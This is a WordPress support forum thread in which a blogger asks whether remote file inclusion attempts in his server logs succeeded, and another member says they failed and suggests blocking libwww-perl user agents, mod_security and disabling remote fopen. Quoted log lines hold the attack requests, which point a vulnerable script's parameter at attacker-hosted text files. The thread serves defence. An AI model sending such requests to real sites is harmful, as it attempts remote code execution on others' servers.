Forums

WordPress › Support » How-To and Troubleshooting

Remote File Inclusion (RFI) Attempts (6 posts)

  1. asechrest
    Member
    Posted 7 months ago #

    Hi, all. I've had a bunch of remote file inclusion attempts today - they've been hammering away at my domain. I've done my best to research the subject but I'm starting from scratch - I knew nothing about it until this evening.

    I'm poring through my server logs and trying to see if the attacks have been successful. Mostly I see 404's, which I've been told probably means that specific attempt was not successful. But in some cases I see like the following, with a 200 success indication:

    97.106.184.215 - - [29/Apr/2009:20:24:56 -0500] "GET /wp-content/plugins/gd-star-rating/css/gdstarating.css.php?s=astarscape%7C20%7C3%7Cpng%7C1%23moxygen%7C20%7C20%7Cpng%7C1 HTTP/1.1" 200 7955 "http://blogingenuity.com/2009/04/08/how-to-validating-your...site-the-easy-way-part-2/%20%20/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5"

    I don't know if this means the attempt was successful and I need to start worrying or what.

    Could anyone who's experienced this shed some light on:
    1) How can I tell if an attempt was successful and what's the next step?
    2) How can I best prevent the attacks in the first place

    Thanks in advance.

  2. whooami
    Member
    Posted 7 months ago #

    what do you see when you put that into a browser?

  3. asechrest
    Member
    Posted 7 months ago #

    I get a page not found notice, which I think is good news. But I have hundreds of these today, from what look like a number of different sources. Some of them appear to be trying to load a text file. I have a bunch similar to this:

    209.62.42.242 - - [29/Apr/2009:15:36:49 -0500] "GET /2009/04/08//vwar/backup/errors.php?error=http://caketaker.biz//scrollerroller/id.txt??? HTTP/1.1" 404 40489 "-" "Mozilla/5.0"

    I've searched my server filesystem for the text file name and it hasn't been found. This is also, I think, good news.

    Generally, though, I'm wondering if I can simply determine if they successfully added a page or successfully loaded a file to my server, and if the answer is no to both, can I feel relatively comfortable (not assured, obviously) that the attempts failed?

    I'm researching how to prevent the attempts altogether. I've checked my file/folder permissions and they seem to be what's recommended. I've read some suggestions not to use "fopen" but understanding that is a bit above me at the moment.

    Thanks for the response.

  4. whooami
    Member
    Posted 7 months ago #

    they failed.

    what theyre trying to load is right here,

    http://www.//sanbokyodan.//fr/editor/xml/copyright.txt

    link broke.

    one of the easiest ways to thwart a lot (not all, just a lot) of rfi attempts is to disallow any libwww-perl user-agents.

    RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^.*$ - [F]

    Thats one way.

    Some will argue with me, but mod_security is also excellent at stopping them.

    Of course the best way is yes, to not use fopen. You can disable it in the php.ini.

  5. asechrest
    Member
    Posted 7 months ago #

    Ok, I'll take a look at implementing those and do some more research to see if not using fopen has any negatives.

    Thanks whooami.

  6. asechrest
    Member
    Posted 6 months ago #

    For anyone new to RFI who comes across this thread in the future...

    After Whooami's help and additional research, I wrote up a little beginners guide to tracking and mitigating Remote File Inclusion.

    Constructive criticism or corrections from those more knowledgeable than me is welcomed.

Reply

You must log in to post.

About this Topic

Tags